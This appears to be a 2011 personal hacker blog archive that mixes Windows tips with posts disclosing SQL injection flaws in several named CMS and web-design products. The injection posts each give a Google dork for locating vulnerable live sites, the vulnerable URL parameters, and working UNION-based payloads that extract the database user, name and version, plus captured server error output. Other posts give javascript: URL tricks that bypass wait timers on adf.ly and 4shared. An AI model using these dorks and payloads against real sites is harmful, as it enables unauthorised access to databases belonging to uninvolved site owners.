Wednesday, October 12, 2011

Monday, August 22, 2011

Run the Application as Administrator Just by a Click!

How to Set Our Application to Always Running as Administrator in Windows 7
-----------------------------------------------------------------------------------------------------

1 - Right click to the application that you want to run as administrator and choose properties.Before that make sure you already set the shortcut for the application.
As example I created a cmd.exe shortcut at Desktop.I want to run cmd.exe as administrator just by a click after this.No need to right click,blalala..wasting my time!


2 - Go to Shortcut tab and choose Advanced.
3 - Tick "Run as Administrator",and DONE!
  
Before as Administrator
After as Administrator.Just by a click!

Monday, August 8, 2011

LASERnet CMS Vulnerable to SQL Injection


Title : LASERnet CMS  Vulnerable to SQL Injection
Vendor : http://cms.lasernet.gr/index.php?lang=en
Dork : intext:"Powered by Lasernet"
Category: WebApps

http://localhost.com/index.php?id=[SQL]

Demo:
http://localhost.com/index.php
?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+


thanks,
-p0pc0rn-


CarRentals CMS Vulnerable to SQL Injection



Title : CarRentals CMS Vulnerable to SQL Injection
Vendor : N/A
Dork : intext:"Powered by CarRentals CMS"
Category: WebApps

http://localhost.com/*.php?id=[SQL]

~/POC/~
-------

http://localhost.com/book-offer.php?offer_id=-1' /*!12345union*/ select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11--+


thanks,
-p0pc0rn-

Thursday, August 4, 2011

Cambria Web Design Vulnerable to Multiple SQL Injection


Title : Cambria Web Design Vulnerable to Multiple SQL Injection
Vendor : http://www.cambria.com
Dork : intext:"Web Design by Cambria" filetype:asp
Dork2 : intext:"Custom software and Web Design by Cambria"
Category: WebApps

http://localhost.com/product_page.asp?ProductID=[SQL]&ProductCatID=[SQL]
http://localhost.com/pagecontent.asp?page=[SQL]
http://localhost.com/product_page.asp?Search=[SQL]
http://localhost.com/articles.asp?ArticleID=[SQL]


There are more parameters need to be checked.

~//POC//~

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

http://127.0.0.1/product_page_detail.asp?ProductID=1&ProductCatID=1'

Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark before the character string ''.

/product_page_detail.asp, line 78

-------------------------------------------------------------------------------------
http://127.0.0.1/product_page_detail.asp?ProductID=1&ProductCatID=1+or+1=convert(int,(@@version))

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.

/product_page_detail.asp, line 78
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

- p0pc0rn -

shoma.net Web Design Vulnerable to Multiple SQL Injection


Title : shoma.net Web Design Vulnerable to Multiple SQL Injection
Website : http://www.shoma.net/
Dork : Developed by Shoma.net
Type : WebApps

http://localhost.com/SubNews.cfm?NewsID=[SQL]
http://localhost.com/details.cfm?TourID=[SQL]&categoryId=[SQL]
http://localhost.com/Hotellist.cfm?starID=[SQL]
http://localhost.com/index_show.asp?idbasic=[SQL]
http://localhost.com/index_view.asp?idrecipie=[SQL]

There are more parameters need to be checked.

#####
#POC#
#####

+++++++++++++++++++++++++++++++++++++++++++++++++++++++
http://127.0.0.1/Subnews.cfm?newsid=1'
Error Executing Database Query.
[Macromedia][SequeLink JDBC Driver][ODBC Socket][Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'newsId=1'''.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++


- p0pc0rn -

Tuesday, July 26, 2011

Infotrex Solutions Web Design Vulnerable to Multiple SQL Injections


Title : Infotrex Solutions Web Design Vulnerable to Multiple SQL Injections
Vendor: http://www.infotrex.net
Dork : intext:"Web Development by Infotrex Solutions"

+++++++++++++++++++++++++++++++
Microsoft Access Injection +
+++++++++++++++++++++++++++++++

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1 - http://www.site.com/details.asp?catid=[]&subcatid=[]&pid=[SQL] +
2 - http://www.site.com/news.asp?action=read&nID=[SQL] +
3 - http://www.site.com/product.asp?catid=[SQL] +
4 - http://www.site.com/contents.asp?id=[SQL] +
5 - http://www.site.com/details.asp?pid=[SQL] +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



Thanks,
p0pc0rn

Tuesday, July 5, 2011

4shared Downloader

How to use?

1 - Make sure you have an account in 4shared.com..just a free account :)
2 - Login into your account

3 - Open command prompt and just run this python script :)

Usage : 4shared.py Url


4 - It will open the download link from your browser and just click save


Here's the script
http://pastebin.com/2eDsyjm9

Friday, July 1, 2011

Adf.ly Bypass

Hate to waiting even 5 secs?
Want to bypass the waiting time?
Its easy
As example you want to download this
http://adf.ly/1wuNc
Go to the link,and at the url bar type this
javascript:showSkip();
The countdown will be skipped and you can download directly get the real link :)

4shared Download Tricks

4shared Download Tricks
So there are two tricks you can do to download file from 4shared.com
Let say we want to download this thing.
http://www.4shared.com/file/fTg3hpDR/a_byte_of_python__persian_tran.html
We can
1 - bypassing waiting time.
Go to download page.
http://www.4shared.com/get/fTg3hpDR/a_byte_of_python__persian_tran.html
and at the url type this
javascript:alert(c=0)
this will bypass the waiting time from 59secs to 0sec :)

another way is

2 - Get the download url directly
at the file page
http://www.4shared.com/file/fTg3hpDR/a_byte_of_python__persian_tran.html
you just need to type this at the url bar
javascript:alert(startDownload)

the download link will popup and just copy and paste at the url to download :)

Unix Command in Windows???

Unix Command in Windows???

Yeah,there's a little secret that might you dont know about Windows 7.We can use Unix command in Windows without using cygwin! believe it?
Let's look it together.

The name of this technology? It used to be called Interix, then became Services for UNIX (SFU) as they added more bits on top of Interix, and is now known as Subsystem for UNIX-based Applications (SUA). The current name is more of a mouthful, but is a more accurate name.


So, to run SUA, you need one of the following versions of Windows:
Windows Server 2008
Windows Server 2003 R2
Windows 7 - Enterprise or Ultimate Edition
Windows Vista - Enterprise or Ultimate Edition

Other than that? Dont work :(

How to enable this SUA? [I'm using Windows 7 Ultimate in this case as example]

1 - Go to the Control Panel.
2 - Browse to Programs and Features.
3 - Click Turn Windows features on or off.
4 - Select the check box for Subsystem for UNIX-based Applications.
5 - Click OK
6 - In the start menu, click All Programs > Subsystem for UNIX-based Applications > Download Utilities for Subsystem for UNIX-based Applications
7 - Download the SUA installer from the Microsoft website. Which in my case,I download this-->Utilities and SDK for UNIX-based Applications_X86.exe. Choose which one suit your pc.
8 - Once downloaded, double-click Utilities and SDK for UNIX-based Applications_X86.exe in your downloads folder.
9 - Go trough the auto-installer.
10 - I'd recommend you choose the custom setup and enable the GNU Utilities and then, in the following step, select all three check boxes to allow su to root, enable setuid and enable case sensitivity.
11 - Finished! And now you can run UNIX commands.